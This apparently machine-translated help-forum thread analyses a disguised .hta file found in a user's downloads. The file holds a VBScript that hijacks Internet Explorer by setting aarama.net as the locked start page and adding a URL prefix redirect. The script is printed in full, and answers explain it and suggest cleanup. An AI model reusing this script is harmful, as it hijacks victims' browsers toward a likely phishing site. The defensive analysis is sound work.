请帮我确定一下我的计算机是否受到了威胁。
我还不确定这是什么。我仍在浏览我在“研究”期间发现的一些 JavaScript(我的级别 = 初学者)文件......
故事:
- Windows 7 x64 Professional、Eset Smart Security 4.2.71.2、最新 Firefox、最新 Chrome、IE 8
我在 Chrome 的默认下载文件夹中找到了一个文件adam-liseli-kizi-otele-goturup-sikiyor.avi.hta 这是一个 VB 脚本:
Set shell = CreateObject("WScript.Shell") shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\mirc","http://aarama.net/","REG_SZ" shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD" shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD" shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://aarama.net/","REG_SZ" shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://aarama.net/","REG_SZ" self.Close
我跟着阿拉玛网,发现有一个钓鱼网站(我认为)看起来像谷歌,并且有很多 JavaScript,我现在正试图理解它。
答案1
好吧,通过进行一些网络层面的挖掘,我可以告诉你这么多:
- 该域名是 20 天前注册的。
- 注册处在卢森堡,但电话号码在丹麦。
- 该网站似乎是土耳其的。
- 域名所有者躲在 PrivacyProtect 后面
- 该网站由位于旧金山的 CloudFlair 托管。
总而言之,这看起来非常非常可疑:
- 这是一个新域名
- 注册信息不对
- 隐藏域名注册人并不一定是坏事,但有些心怀不轨的人会这么做
- CloudFlare 提供免费帐户,且几乎不需要任何检查。
快速浏览一下 javascript 并在 Links 中玩弄网站,并没有发现任何太糟糕的事情,但我还没有正确分析 JS(快到午夜了)。明天早上我会深入挖掘一下。
如果您确实发现它确实是恶意软件,那么就会致电 CloudFlare 以提醒他们 - 他们可能会立即关闭该网站。
更新
aarama.net 已经转移到德国的一个托管机构,该机构因托管机器人和其他可疑网站 (your-server.de) 而臭名昭著。
答案2
我不太懂剧本,但这个剧本的意图似乎很清楚。
Set shell = CreateObject("WScript.Shell")
第一行,我不太确定。不过,谷歌搜索似乎证实了我的想法,这是剧本中相当标准的开场白。
其余行似乎正在设置各种注册表项。
shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\mirc","http://aarama.net/","REG_SZ"
这为 Internet Explorer 添加了一个新的 URL 前缀。实际上,每当 IE 被告知请求以“mirc.”开头的资源并且未指定协议时,它都会插入“http://aarama.net/“在处理地址之前,地址前面会有一个空格。因此,如果您在地址栏中输入“mirc.google.com”,IE 会将其翻译为“http://aarama.net/mirc.google.com“。这可能有助于恶意网站(或下载的恶意软件)上的其他一些脚本发挥作用。
shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
这些添加的注册表项通常用于对 Internet Explorer 实施组策略控制。您可能会发现无法再通过控制面板更改 IE 主页。
shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://aarama.net/","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://aarama.net/","REG_SZ"
这些设置“http://aarama.net/“到您的主页 - 确保您至少访问该网站一次,并有机会成为任何可能存在的网络钓鱼诈骗或恶意代码的受害者。当然,早期的密钥将确保您不会只访问一次,因为您无法更改主页。
self.Close
再说一遍,我不太懂剧本。但我认为这一幕显然是结束的。
您可以使用这些信息来做以下事情:
1.)(太晚了) 不要去那个网站。
2.) 使用一些好的防病毒/反恶意软件程序检查您的计算机。我推荐使用 Avast! 启动时扫描、Malwarebytes 和 SpyBot Search & Destroy。如果可能,使用单独的、已知良好的一次性机器进行扫描。或者,获取一个好的 LiveCD 进行扫描。
3.) 检查注册表中是否有脚本创建的值。如果它们仍然存在,请备份注册表,然后删除创建的值或将其更改为您喜欢的设置。前三个应该被删除。最后两个,设置为您的偏好或“about:blank”。
4.) 如果您在此之后发现系统上有任何可疑活动,则是时候采取“轨道核打击”措施了。希望您有良好的备份。
答案3
这看起来确实很奇怪。我建议做几件事 - 首先是 malwarebytes - 它是一个很好的扫描器,偶尔会被恶意软件阻止 - 当它工作时很有效。除此之外,在进程管理器和 netstat 中查找奇怪的进程。
我还建议学习使用并使用 rootkit revealer(在存在 rootkit 的情况下)和 hijackthis 来确认 - 后者的日志在尝试确定是否存在入侵时非常有用,尽管它们需要一些解释。
答案4
我不是专家,但看起来它正在将该域名设为 Internet Explorer 的主页。该域名链接到 Google 网络钓鱼者。
目的是让您登录 Google 帐户,以便他们可以收集帐户信息。我还没有仔细查看过该网站,但我怀疑它还有其他用途。
无论如何,您都应该使用 Malwarebytes 进行扫描以确保无误。